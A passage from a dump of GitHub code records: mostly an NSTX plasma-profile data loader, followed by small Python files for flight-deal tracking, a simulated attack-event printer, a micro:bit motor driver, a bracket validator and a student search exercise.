output['rho_lbl'] = self.rho_coord\n \n return output\n\n\n\n \n def load_splines(self):\n \n \n \n \n if 'SPLINES' in self.RAW: \n return self.eq_mapping(self.RAW['SPLINES'])\n\n \n TT = time()\n print_line(' * Fetching SPLINES ... ')\n \n tree = 'ACTIVESPEC'\n chers_edition = 'CT1'\n chers_signals = ['ZEFFS', 'VTS','TIS', 'NCS', 'RS', 'TIME']\n TDI = [f'\\\\{tree}::TOP.CHERS.ANALYSIS.{chers_edition}:{sig}' for sig in chers_signals]\n mdts_signals = ['SPLINE_NE','SPLINE_TE', 'SPLINE_RADII','TS_TIMES']\n TDI += [f'\\\\{tree}::TOP.MPTS.OUTPUT_DATA.BEST:'+sig for sig in mdts_signals]\n\n Zeff,Vtor,Ti, nC, R,T, TS_ne,TS_Te,TS_R,TS_T = mds_load(self.MDSconn, TDI, tree, self.shot)\n print('\\t done in %.1fs'%(time()-TT))\n\n #use SI units!!\n Vtor *= 1e3 #m/s\n Ti *= 1e3 #eV\n TS_Te *= 1e3 #eV\n TS_ne *= 1e6 #m^3\n nC *= 1e6 #m^3\n \n R /= 100 #m\n TS_R /= 100 #m\n \n \n invalid = Ti <= 0\n \n Vtor[invalid] = np.nan\n Ti[invalid] = np.nan\n nC[invalid] = np.nan\n Zeff[invalid] = np.nan\n Ti= np.maximum(Ti,10)\n\n ##hydrogen Mach number \n from scipy.constants import e,m_u\n mach = np.sqrt(2*m_u/e*Vtor**2/(2*Ti))\n \n #truncate maximum mach number\n mach = np.minimum(mach,1)\n\n\n #Map Te on CHERS radial and temporal base\n Te_Ti = RectBivariateSpline(TS_R, TS_T, TS_Te,kx=1,ky=1)(R,T).T.astype('single')/Ti\n\n \n self.RAW['SPLINES'] = splines = Tree()\n \n splines['Te'] = splines['ne'] = ds = Dataset('spline_TS.nc')\n ds['ne'] = xarray.DataArray(TS_ne.T, dims=['time','R'])\n ds['Te'] = xarray.DataArray(TS_Te.T, dims=['time','R'])\n ds['Z'] = xarray.DataArray(TS_R*0, dims=['R'])\n ds['R'] = xarray.DataArray(TS_R, dims=['R'])\n ds['time'] = xarray.DataArray(TS_T, dims=['time'])\n \n ds = Dataset('spline_CHERS.nc') \n splines['Zeff'] = splines['Mach'] = splines['Ti'] = splines['nC6'] = splines['Te/Ti'] = splines['omega'] = ds\n ds['Ti'] = xarray.DataArray(Ti, dims=['time','R'])\n ds['Zeff'] = xarray.DataArray(Zeff, dims=['time','R'])\n ds['nC6'] = xarray.DataArray(nC, dims=['time','R'])\n ds['omega'] = xarray.DataArray(Vtor/R, dims=['time','R'])\n ds['Mach'] = xarray.DataArray(mach, dims=['time','R'])\n ds['Te/Ti'] = xarray.DataArray(Te_Ti, dims=['time','R'])\n ds['Z'] = xarray.DataArray(R*0, dims=['R'])\n ds['R'] = xarray.DataArray(R, dims=['R'])\n ds['time'] = xarray.DataArray(T, dims=['time'])\n \n print('\\t done in %.1fs'%(time()-TT))\n \n splines['systems'] = ['Te','Ti','Zeff','ne','nC6','omega','Te/Ti','Mach']\n \n \n self.eq_mapping(splines)\n \n \n splines['EQM'] = Tree({'id':id(self.eqm),'dr':0, 'dz':0,'ed':self.eqm.diag})\n\n\n \n return splines\n \n \n \n \n \n\n def load_asymmetry(self,chers_edition='CT1',dR=0):\n \n \n self.RAW.setdefault('Asymmetry',Tree())\n asym = self.RAW['Asymmetry']\n\n A = 2 #Main ion mass\n Z = 1 #Main ion charge\n Zc = 6 #C charge\n Ac = 12 #C mass\n \n #calculate asymmetry correction factors on CHERS timebase as function of R?\n splines = self.load_splines()\n \n EQM = Tree({'id':id(self.eqm),'ed':self.eqm.diag})\n \n if 'EQM' not in asym or EQM != asym['EQM']:\n asym['EQM'] = EQM\n \n rho_grid = np.linspace(0,1,102)[1:]\n theta_grid = np.linspace(0,np.pi*2,50,endpoint=False)\n #get flux surfaces \n T = splines['Mach']['time'].values\n R,Z = self.eqm.rhoTheta2rz(rho_grid,theta_grid,T,coord_in=self.rho_coord, n_line=101)\n \n # calculate elemental dV for each R,Z\n dRdZ = np.array((np.gradient(Z,axis=[1,2]), \n np.gradient(R,axis=[1,2]))).T\n \n dV = 2*np.pi*R*np.linalg.det(dRdZ).T\n \n asym['FSA'] = FSA = Dataset('FSA.nc')\n FSA['dV'] = xarray.DataArray(dV,dims=['time','theta','rho'], attrs={'units':'m^3'})\n FSA['R'] = xarray.DataArray(R,dims=['time','theta','rho'], attrs={'units':'m'})\n FSA['Z'] = xarray.DataArray(Z,dims=['time','theta','rho'], attrs={'units':'m'})\n FSA['Rlfs'] = xarray.DataArray(R[:,0],dims=['time','rho'], attrs={'units':'m'})\n FSA['rho'] = xarray.DataArray(rho_grid,dims=['rho'], attrs={'units':'-'})\n FSA['theta'] = xarray.DataArray(theta_grid,dims=['theta'], attrs={'units':'rad'})\n FSA['time'] = xarray.DataArray(T,dims=['time'], attrs={'units':'s'})\n \n \n \n #load from cache \n FSA = asym['FSA']\n sepR = np.hstack([sr[sr > 0] for sr in self.eqm.separatrixR]) \n Rgrid = np.linspace(sepR.min(),sepR.max(),100)\n\n \n mach = splines['Mach']['Mach'].values/np.sqrt(2) #hydrogen Mach number \n Te_Ti = splines['Te/Ti']['Te/Ti'].values\n Zeff = splines['Zeff']['Zeff'].values\n spline_R = splines['Mach']['R'].values\n spline_T = splines['Mach']['time'].values\n \n \n \n Aeff = Zeff*A #effective ion mass estimated from zeff, valid for D+C\n asym_factor_e = 1/(1+Zeff*Te_Ti)* Aeff * mach**2\n asym_factor_c = (1-Zc/Ac* Aeff*Te_Ti/(1+Zeff*Te_Ti))*Ac*mach**2\n\n \n valid = np.isfinite(asym_factor_c)\n\n rho_grid = self.eqm.rz2rho(Rgrid,Rgrid*0,spline_T,self.rho_coord)\n spline_rho = self.eqm.rz2rho(spline_R,spline_R*0,spline_T,self.rho_coord)\n\n \n ne0_ne = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n nc0_nc = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n\n nefsa_ne = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n ncfsa_nc = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n\n for it in range(len(spline_T)):\n #find index closest to magnetic axis\n imin = np.argmin(rho_grid[it])\n \n #use only LFS CHERS data, HFS are often too poor\n valid[it] &= spline_R > Rgrid[imin]\n \n #LFS R for each radial location \n Rlfs_grid = np.interp(rho_grid[it], rho_grid[it,imin:], Rgrid[imin:]+dR)\n \n\n #interpolate asymmetry factors on the LFS radial grid\n asym_factor_e_ = np.interp(Rlfs_grid, spline_R[valid[it]], asym_factor_e[it][valid[it]],right=0)\n asym_factor_c_ = np.interp(Rlfs_grid, spline_R[valid[it]], asym_factor_c[it][valid[it]],right=0)\n\n dR2 = (Rgrid/Rlfs_grid)**2-1\n \n #ratio between LFS and local density\n ne0_ne[it] = np.exp(-asym_factor_e_*dR2)\n nc0_nc[it] = np.exp(-asym_factor_c_*dR2)\n \n \n \n i_eq = np.argmin(np.abs(spline_T[it]-FSA['time'].values))\n #interpolate asymmetry factors on the LFS radial grid\n R = FSA['R'].values[i_eq]\n Rlfs = FSA['Rlfs'].values[i_eq]\n rho = FSA['rho'].values\n\n asym_factor_e_ = np.interp(rho, spline_rho[it,valid[it]], asym_factor_e[it,valid[it]])\n #plt.plot( spline_rho[it,valid[it]], asym_factor_e[it,valid[it]] )\n asym_factor_c_ = np.interp(rho, spline_rho[it,valid[it]], asym_factor_c[it,valid[it]])\n \n dR2 = (R/Rlfs)**2-1\n\n neR_ne0 = np.exp(asym_factor_e_[None]*dR2)\n ncR_nc0 = np.exp(asym_factor_c_[None]*dR2)\n \n #calculate flux surface average\n dV = FSA['dV'].values[i_eq]\n \n \n #ratio between FSA and LFS density\n nefsa_ne0 = np.average(neR_ne0,0, dV)\n ncfsa_nc0 = np.average(ncR_nc0,0, dV) \n \n #ratio between FSa and local density\n nefsa_ne[it] = np.interp(Rlfs_grid, Rlfs, nefsa_ne0)*ne0_ne[it]\n ncfsa_nc[it] = np.interp(Rlfs_grid, Rlfs, ncfsa_nc0)*nc0_nc[it]\n \n asym['correction'] = corr = Dataset('asym_correction.nc')\n corr['ne0_ne'] = xarray.DataArray(ne0_ne,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['nc0_nc'] = xarray.DataArray(nc0_nc,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['nefsa_ne'] = xarray.DataArray(nefsa_ne,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['ncfsa_nc'] = xarray.DataArray(ncfsa_nc,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['time'] = xarray.DataArray(spline_T,dims=['time'], attrs={'units':'s'})\n corr['Rgrid'] = xarray.DataArray(Rgrid,dims=['Rgrid'], attrs={'units':'m'})\n \n return corr\n \n\n def load_cer(self,tbeg,tend, systems, options=None):\n #load Ti and omega at once\n TT = time()\n rshift = 0\n cf_correction = 'None'\n edition = 'CT1'\n\n tree = 'ACTIVESPEC'\n if options is not None:\n selected,editions = options['Analysis']\n edition = selected.get()\n if 'Position error' in options:\n rshift = options['Position error']['R shift [cm]'].get()/100. #[m] \n if 'Poloidal asymmetry correction' in options:\n cf_correction = options['Poloidal asymmetry correction'][0].get()\n\n \n #TODO check if data exists at all!\n if edition is None:\n raise Exception('No CHERS analysis data')\n \n #Ti below 300eV is unreliable??\n \n self.RAW.setdefault('CHERS',Tree())\n cer = self.RAW['CHERS'].setdefault(edition,Tree())\n\n #load from catch if possible\n cer.setdefault('diag_names',Tree())\n cer['systems'] = systems\n \n #load only new systems\n load_systems = list(set(systems)-set(cer.keys()))\n \n #update equilibrium for already loaded systems\n cer = self.eq_mapping(cer, dr=rshift)\n \n \n if len(load_systems) == 0 and np.all([cer[sys].attrs['cf_correction'] == cf_correction for sys in cer['systems']]):\n return cer\n \n \n print_line( ' * Fetching CHERS '+edition.upper()+' data ...' )\n \n #AW, AWB active and background aplitude, unknown units \n data = {\n 'Ti': {'label':'Ti','unit':'eV','sig':['ZTI','DTI'],'scale':1e3},\n 'omega': {'label':r'\\omega_\\varphi','unit':'rad/s','sig':['VT','DVT'],'scale':1e3},\n #'omega': {'label':r'\\omega_\\varphi','unit':'kHz','sig':['VT','DVT'],'scale':1/(2*np.pi)},\n 'nimp': {'label':r'n_c','unit':'m^{-3}','sig':['NC','DNC'],'scale':1e6},\n }\n \n #list of MDS+ signals for each channel\n signals = data['Ti']['sig']+data['omega']['sig']+data['nimp']['sig']+['RADIUS', 'TIME', 'VALID']\n\n \n\n TDI = []\n #prepare list of loaded signals\n for sig in signals:\n TDI.append( '\\\\'+tree+'::TOP.CHERS.ANALYSIS.'+edition+':'+sig)\n\n Ti,Tierr,Vtor,Vtorerr,Nc,Nc_err,R,tvec,valid = mds_load(self.MDSconn,TDI, tree, self.shot) \n \n if len(tvec) == 0:\n raise Exception('No CHERS analysis data')\n\n \n Z = R*0\n R /= 100 #[m]\n\n valid = np.bool_(valid)\n \n #map to radial coordinate \n rho = self.eqm.rz2rho(R+rshift,Z,tvec,self.rho_coord)\n \n \n #show these points but ignore them in the fit\n valid &= np.isfinite(Nc > 0)&np.isfinite(Nc_err)\n valid[valid] &= (Ti[valid] > 0)&(Tierr[valid] > 0)\n valid[valid] &= (Nc[valid] > 0)&(Nc_err[valid] > 0)\n\n #valid = np.bool_(valid)\n Tierr[~valid] = -np.inf\n Vtorerr[~valid] = -np.inf\n channel = np.arange(len(R))\n \n omega = Vtor/R\n omega_err = Vtorerr/R\n \n #guess of nC errorbars from time scatter\n Nc_ = np.ma.array(Nc, mask=~valid)\n Nc_err[:] = np.ma.median(np.abs(np.diff(Nc_,axis=0)),axis=0).data\n Nc_err[~valid] = -np.inf\n\n \n if cf_correction != 'None':\n corr = self.load_asymmetry(chers_edition=edition,dR=rshift)\n if cf_correction == 'LFS':\n nratio = corr['nc0_nc'].values \n elif cf_correction == 'FSA':\n nratio = corr['ncfsa_nc'].values \n else:\n raise Exception('Asymetry correction '+cf_correction+' is not supported')\n\n corr = RectBivariateSpline(corr['time'].values,corr['Rgrid'].values, nratio)(tvec,R)\n\n Nc[valid] *= corr[valid]\n Nc_err[valid] *= corr[valid]\n \n \n\n for sys in systems:\n cer['diag_names'][sys]=['CHERS'] \n cer[sys] = Dataset('CHERS_'+sys+'.nc',attrs={ 'system':sys, 'cf_correction': cf_correction})\n cer[sys]['Ti'] = xarray.DataArray(Ti*data['Ti']['scale'],dims=['time','channel'],\n attrs={'units':data['Ti']['unit'],'label':'T_i'})\n cer[sys]['Ti_err'] = xarray.DataArray(Tierr*data['Ti']['scale'],dims=['time','channel'] )\n \n cer[sys]['omega'] = xarray.DataArray(omega*data['omega']['scale'],dims=['time','channel'],\n attrs={'units':data['omega']['unit'],'label':r'\\omega_\\phi'})\n cer[sys]['omega_err'] = xarray.DataArray(omega_err*data['omega']['scale'],dims=['time','channel'])\n \n cer[sys]['nC6'] = xarray.DataArray(Nc*data['nimp']['scale'],dims=['time','channel'], \n attrs={'units': data['nimp']['unit'],'label':r'n_{C^{6+}}'})\n cer[sys]['nC6_err'] = xarray.DataArray(Nc_err*data['nimp']['scale'],dims=['time','channel'])\n \n cer[sys]['diags']= xarray.DataArray( np.tile(('CHERS',), Ti.shape),dims=['time','channel']) \n\n cer[sys]['R'] = xarray.DataArray(R, dims=['channel'], attrs={'units':'m'})\n cer[sys]['Z'] = xarray.DataArray(Z, dims=['channel'], attrs={'units':'m'})\n cer[sys]['rho'] = xarray.DataArray(rho,dims=['time','channel'], attrs={'units':'-'})\n cer[sys]['time'] = xarray.DataArray(tvec,dims=['time'], attrs={'units':'s'})\n cer[sys]['channel'] = xarray.DataArray(channel,dims=['channel'], attrs={'units':'-'})\n \n\n \n cer['EQM'] = Tree({'id':id(self.eqm),'dr':rshift, 'dz':0,'ed':self.eqm.diag})\n print('\\t done in %.1fs'%(time()-TT))\n \n return cer\n \n \n \n \n \n \n def load_ts(self, tbeg,tend,systems, options=None):\n \n T = time()\n\n revision = 'BEST'\n rshift = 0\n cf_correction = 'None'\n if options is not None:\n if 'TS revision' in options:\n selected,revisions = options['TS revision']\n revision = selected.get()\n if 'Position error' in options:\n rshift = options['Position error']['R shift [cm]'].get()/100. #[m] \n if 'Poloidal asymmetry correction' in options:\n cf_correction = options['Poloidal asymmetry correction'][0].get()\n \n\n #use cached data\n self.RAW.setdefault('TS',Tree())\n ts = self.RAW['TS'].setdefault(revision,Tree({'systems':systems}))\n\n ts['systems'] = list(systems)\n systems = list(set(systems)-set(ts.keys()))\n\n \n \n \n #update mapping of the catched data\n ts = self.eq_mapping(ts, dr =rshift) \n ts.setdefault('diag_names',Tree())\n \n if len(systems) == 0 and np.all([ts[sys].attrs.get('cf_correction','') == cf_correction for sys in ts['systems']]):\n #assume that equilibrium could be changed\n return ts\n else:\n systems = ts['systems']\n\n print_line( ' * Fetching TS data ...')\n\n \n signals = 'FIT_NE', 'FIT_NE_ERR', 'FIT_TE', 'FIT_TE_ERR','TS_TIMES','FIT_RADII'\n \n \n \n tree = 'ACTIVESPEC'\n #prepare list of loaded signals\n tdi = '\\\\%s::TOP.MPTS.OUTPUT_DATA.%s:'%(tree,revision)\n TDI = [tdi+sig for sig in signals]\n\n ne,ne_err,Te,Te_err,tvec,R = mds_load(self.MDSconn, TDI, tree, self.shot)\n R /= 100 #m\n Z = R*0\n Te *= 1e3 #eV\n Te_err *= 1e3 #eV\n ne *= 1e6 #m^-3\n ne_err *= 1e6 #m^-3\n \n \n #these points will be ignored and not plotted (negative errobars )\n invalid = (Te_err<=0) | (Te <=0 ) | (ne_err<=0) | (ne <=0 )\n Te_err[invalid] = -np.infty\n ne_err[invalid] = -np.infty\n \n channel = np.arange(len(R))\n\n rho = self.eqm.rz2rho(R+rshift,Z,tvec,self.rho_coord)\n \n \n if cf_correction != 'None':\n corr = self.load_asymmetry(dR=rshift)\n if cf_correction == 'LFS':\n nratio = corr['ne0_ne'].values \n if cf_correction == 'FSA':\n nratio = corr['nefsa_ne'].values \n\n corr = RectBivariateSpline(corr['time'].values,corr['Rgrid'].values, nratio)(tvec,R).T\n\n ne[~invalid] *= corr[~invalid]\n ne_err[~invalid] *= corr[~invalid]\n \n \n \n imin = np.argmin(rho.mean(0))\n index = {'HFS':slice(0,imin), 'LFS':slice(imin,None)}\n for sys in systems:\n ind = index[sys]\n ts['diag_names'][sys]=['TS:'+sys]\n\n ts[sys] = Dataset( 'TS:'+sys+'.nc' ,attrs={'system':sys, 'cf_correction': cf_correction})\n ts[sys]['ne'] = xarray.DataArray(ne[ind].T,dims=['time','channel'], attrs={'units':'m^{-3}','label':'n_e'})\n ts[sys]['ne_err'] = xarray.DataArray(ne_err[ind].T,dims=['time','channel'], attrs={'units':'m^{-3}'})\n ts[sys]['Te'] = xarray.DataArray(Te[ind].T,dims=['time','channel'], attrs={'units':'eV','label':'T_e'})\n ts[sys]['Te_err'] = xarray.DataArray(Te_err[ind].T,dims=['time','channel'], attrs={'units':'eV'})\n ts[sys]['diags']= xarray.DataArray( np.tile(('TS:'+sys,), ne[ind].T.shape),dims=['time','channel']) \n ts[sys]['R'] = xarray.DataArray(R[ind], dims=['channel'], attrs={'units':'m'})\n ts[sys]['Z'] = xarray.DataArray(Z[ind],dims=['channel'], attrs={'units':'m'})\n ts[sys]['rho'] = xarray.DataArray(rho[:,ind],dims=['time','channel'], attrs={'units':'-'})\n ts[sys]['time'] = xarray.DataArray(tvec,dims=['time'], attrs={'units':'s'})\n ts[sys]['channel'] = xarray.DataArray(channel[ind],dims=['channel'], attrs={'units':'-'})\n \n \n print('\\t done in %.1fs'%(time()-T))\n ts['EQM'] = Tree({'id':id(self.eqm),'dr':rshift, 'dz':0, 'ed':self.eqm.diag})\n\n return ts \n \n \n \n \n def load_elms(self,option):\n node = option['elm_signal'].get()\n elm_time, elm_val, elm_beg, elm_end = [],[],[],[]\n self.RAW['ELMS'] = Tree()\n self.RAW['ELMS'][node] = Tree({'tvec': elm_time, 'data':elm_val, \n 'elm_beg':elm_beg,'elm_end':elm_end,'signal':node})\n \n return self.RAW['ELMS'][node]\n \n\n def load_mode_loc(self,option=None):\n \n if 'MHDloc' in self.RAW and 'EQM' in self.RAW['MHDloc'] and self.RAW['MHDloc']['EQM']['id'] == id(self.eqm):\n return self.RAW['MHDloc']\n \n self.RAW['MHDloc'] = Tree()\n \n rho = np.linspace(0,1,100)\n q = np.abs(self.eqm.getQuantity(rho, 'QPSI', coord_in=self.rho_coord))\n \n modes = {'1/1':1, '2/1': 2, '3/1': 3, '4/1': 4,'5/1': 5, '3/2': 3/2, '4/3': 4/3}\n rho_modes = {}\n \n \n for name, qval in modes.items():\n rho_modes[name] = []\n for it,t in enumerate(self.eqm.t_eq):\n imin = np.argmin(q[it])\n rho_modes[name].append(np.interp(qval, q[it, imin:], rho[imin:], left=np.nan))\n rho_modes[name] = np.single(rho_modes[name])\n \n self.RAW['MHDloc']['tvec'] = self.eqm.t_eq\n self.RAW['MHDloc']['modes'] = rho_modes\n self.RAW['MHDloc']['EQM'] = Tree({'id':id(self.eqm),'dr':0, 'dz':0, 'ed':self.eqm.diag})\n\n return self.RAW['MHDloc']\n \n \n def load_sawteeth(self):\n return {'tvec':[]}\n \n \n \n \n \n \n\n \n \n \n \n#replace a GUI call\n#np\ndef main():\n #mdsserver = 'localhost'\n #MDSconn = MDSplus.Connection(mdsserver)\n #MDSconn.openTree('ACTIVESPEC', 141716)\n \n #mdsserver = 'skylark.pppl.gov:8501'\n #import MDSplus\n #try:\n #MDSconn = MDSplus.Connection(mdsserver)\n #except:\n mdsserver = 'localhost'\n MDSconn = MDSplus.Connection(mdsserver)\n TT = time()\n shot = 115559\n #shot = 204179\n shot = 141040\n shot = 141040\n rho_coord = 'rho_tor'\n \n \n \n print(shot)\n print_line( ' * Fetching EFIT01 data ...')\n from map_equ import equ_map\n\n eqm = equ_map(MDSconn)\n eqm.Open(shot, 'EFIT01', exp='NSTXU')\n\n #load EFIT data from MDS+ \n T = time()\n eqm._read_pfm()\n eqm.read_ssq()\n eqm._read_scalars()\n eqm._read_profiles()\n print('\\t done in %.1f'%(time()-T))\n \n\n loader = data_loader(MDSconn, shot, eqm, rho_coord)\n\n import tkinter as tk\n myroot = tk.Tk(className=' Profiles')\n\n I = lambda x: tk.IntVar(value=x)\n S = lambda x: tk.StringVar(value=x)\n D = lambda x: tk.DoubleVar(value=x)\n \n \n ts_revisions = []\n CHERS_revisions = []\n \n default_settings = OrderedDict()\n\n default_settings['Ti']={'systems':{'CER system':([], )},\\\n 'load_options':{'CER system':{'Analysis':(S('CT2'), CHERS_revisions),\n 'Corrections':{'Zeeman Splitting':I(1) }}}}\n\n default_settings['omega']= {'systems':{'CER system':([], )},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['nC6'] = {'systems':{'CER system':([],) },\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['Te']= {'systems':{'TS system':(['LFS',I(1)],['HFS',I(1)]) },\n 'load_options':{'TS system':{\"TS revision\":(S('BEST'), ts_revisions)}}}\n\n default_settings['ne']= {'systems':{'TS system':(['LFS',I(1)],['HFS',I(1)])},\n 'load_options':{'TS system':{\"TS revision\":(S('BEST'), ts_revisions)}}}\n \n default_settings['Mach']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n default_settings['Te/Ti']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(S('CT1'), CHERS_revisions)}}}\n \n #loader.load_splines()\n loader.load_mode_loc()\n \n try:\n data = loader( 'ne', default_settings,tbeg=eqm.t_eq[0], tend=eqm.t_eq[-1])\n finally:\n MDSconn.disconnect()\n print('\\t done in %.1f'%(time()-T))\n \n print('\\n\\t\\t\\t Total time %.1fs'%(time()-TT))\n\n \nif __name__ == \"__main__\":\n main()\n \n\n\n\n\n","repo_name":"odstrcilt/quickfit","sub_path":"NSTX/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":42071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73149476524","text":"import requests\nfrom pprint import pprint\n\n#you'll need create your own Google Sheet with 2 tabs: one with destinations containing threshold prices and another one with users\nSHEETY_PRICES_ENDPOINT = \"https://api.sheety.co/048eff315fe5903f3238db08d1766717/flightDeals/prices\"\nSHEETY_USERS_ENDPOINT = \"https://api.sheety.co/048eff315fe5903f3238db08d1766717/flightDeals/users\"\n\n\nclass DataManager:\n def __init__(self):\n self.destination_data = {}\n\n def get_destination_data(self):\n response = requests.get(SHEETY_PRICES_ENDPOINT)\n data = response.json()\n self.destination_data = data[\"prices\"]\n return self.destination_data\n\n def update_destination_codes(self):\n for city in self.destination_data:\n new_data = {\n \"price\": {\n \"iataCode\": city[\"iataCode\"],\n }\n }\n response = requests.put(\n url=f\"{SHEETY_PRICES_ENDPOINT}/{city['id']}\",\n json=new_data,\n )\n print(response.text)\n\n def get_user_data(self):\n response = requests.get(SHEETY_USERS_ENDPOINT)\n data = response.json()\n self.user_data = data[\"users\"]\n return self.user_data\n\n# for row in range(len(result[\"prices\"])):\n# print(result[\"prices\"][row][\"city\"])\n\n","repo_name":"ArturMalkov/Flightdeals","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22473282477","text":"#!/bin/python\n\nimport random\nfrom time import sleep\n\nprob_victim = [1, 1, 2, 2, 3]\nprob_attacker = [3, 1, 2, 3, 1]\nmin_time = 1\nmax_time = 5\n\nDATA = [{\n \"id\": i, \n \"victim\": sum(prob_victim[:i + 1])/sum(prob_victim), \n \"attacker\": sum(prob_attacker[:i + 1])/sum(prob_attacker)}\n for i in range(len(prob_victim))]\n\ndef get_random(key):\n r = random.random()\n for person in DATA:\n if person[key] > r:\n return person[\"id\"]\n\n raise ValueError('Cannot get {} for random number: {}'.format(key, r))\n\ndef get_random_victim():\n return get_random(\"victim\")\n\ndef get_random_attacker():\n return get_random(\"attacker\")\n\nwhile True:\n victim = get_random_victim()\n attacker = get_random_attacker()\n print(\"{} attacking {}\".format(attacker, victim))\n\n to_sleep = random.random() * (max_time - min_time) + min_time\n sleep(to_sleep)\n\n\n","repo_name":"lkrsnik/dragon_hack_2017","sub_path":"scripts/random_attacks.py","file_name":"random_attacks.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35231080917","text":"from microbit import *\r\nDir = [\r\n 'f',\r\n 'b',\r\n]\r\n\r\n\r\nclass MotorDriver():\r\n def __init__(self):\r\n self.PWMA = pin8\r\n self.AIN1 = pin13\r\n self.AIN2 = pin12\r\n self.PWMB = pin16\r\n self.BIN1 = pin14\r\n self.BIN2 = pin15\r\n self.S0 = pin0\r\n self.S1 = pin1\r\n self.S2 = pin2\r\n self.S0.set_analog_period(20)\r\n self.S1.set_analog_period(20)\r\n self.S2.set_analog_period(20)\r\n\r\n def MotorRun(self, motor, index, speed):\r\n if(speed > 16):\r\n return\r\n speed = speed * 64 - 1\r\n\r\n if(motor == 0):\r\n self.PWMA.write_analog(speed)\r\n if(index == Dir[0]):\r\n self.AIN1.write_digital(1)\r\n self.AIN2.write_digital(0)\r\n else:\r\n self.AIN1.write_digital(0)\r\n self.AIN2.write_digital(1)\r\n else:\r\n self.PWMB.write_analog(speed)\r\n if(index == Dir[0]):\r\n self.BIN1.write_digital(1)\r\n self.BIN2.write_digital(0)\r\n else:\r\n self.BIN1.write_digital(0)\r\n self.BIN2.write_digital(1)\r\n\r\n def MotorStop(self, motor):\r\n if (motor == 0):\r\n self.PWMA.write_analog(0)\r\n else:\r\n self.PWMB.write_analog(0)\r\n\r\n def ServosTurnZero(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(25)\r\n elif(servo == 1):\r\n self.S1.write_analog(25)\r\n else:\r\n self.S2.write_analog(25)\r\n\r\n def ServosTurnFull(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(128)\r\n elif(servo == 1):\r\n self.S1.write_analog(128)\r\n else:\r\n self.S2.write_analog(128)\r\n\r\n def ServosStop(self, servo):\r\n if(servo == 0):\r\n self.S0.write_analog(0)\r\n elif(servo == 1):\r\n self.S1.write_analog(0)\r\n else:\r\n self.S2.write_analog(0)\r\n\r\n def ServoTurn(self, servo, angle):\r\n if(angle > 180):\r\n return\r\n temp = angle / 2 + 25\r\n if(servo == 0):\r\n self.S0.write_analog(temp)\r\n elif(servo == 1):\r\n self.S1.write_analog(temp)\r\n else:\r\n self.S2.write_analog(temp)\r\n\r\n\r\n\r\n","repo_name":"cyryllo/BorsukPY","sub_path":"borsuk.py","file_name":"borsuk.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4233737647","text":"import config\nimport futium\nfrom datetime import date\nfrom datetime import datetime\n\npre_mrkt, post_mrkt, data_date, version = config.pre_mrkt, config.post_mrkt, config.data_date.lower(), config.version\n\n## convert to integer then to string \npre_mrkt, post_mrkt = str(int(config.pre_mrkt == True)), str(int(config.post_mrkt == True))\n\n# get date value\nif data_date != 'today':\n file_date = datetime.strptime(data_date, '%Y-%m-%d').date()\nelse:\n file_date = date.today()\n\n\n# convert them to single char \nfile_dates = [str(file_date.year)[2:], futium.oneChar(file_date.month), futium.oneChar(file_date.day)]\n\ndef filename(ticker, k):\n if k == 'raw':\n filename = \"\".join([ticker, '-', ''.join(file_dates), '.parquet'])\n else: \n # if the ticker is an actual stock\n if ticker != '':\n # [ticker]-[version]-[k][date][preMRKT][postMRKT].csv\n filename = \"\".join([ticker, '-', version, '-', str(k), ''.join(file_dates), pre_mrkt, post_mrkt, '.parquet'])\n else: \n filename = \"\".join([version, '-' + str(k), ''.join(file_dates), pre_mrkt, post_mrkt, '.csv'])\n \n return filename\n","repo_name":"Futium/quantitative-analysis","sub_path":"naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28629963487","text":"class Solution:\n def isValid(self, s: str) -> bool:\n stack = []\n bracket = {'(': ')', '[': ']', '{': '}'}\n for ch in s:\n if ch in bracket:\n stack.append(ch)\n\n else:\n if not stack or bracket[stack.pop()] != ch:\n return False\n\n return len(stack) == 0","repo_name":"pleiadex/coding-test","sub_path":"leetcode/Valid_Parentheses.py","file_name":"Valid_Parentheses.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8511289476","text":"# You are close on the last one.\n# You just need to go through your list and see which is the most frequent (count each one).\n# nice work.\n\n'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\n\n#1. (7pts) Write code which finds and prints the longest word in the provided dictionary.\n# If there are more than one longest word, print them all.\n# Make a list and add words to them based on length\nprint(\"Problem #1\")\nimport re\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\n\ndictionary_list = []\nfile = open(\"dictionary.txt\", \"r\")\nfor line in file:\n words = split_line(line)\n for word in words:\n dictionary_list.append(word)\n\nlong_words = []\nlongest_words = []\nfile_length = (len(dictionary_list))\nfile_length = int(file_length)\n\ndictionary_file = open(\"dictionary.txt\")\nnumber = 0\nlong_word = \"\"\nfor word in dictionary_file:\n if 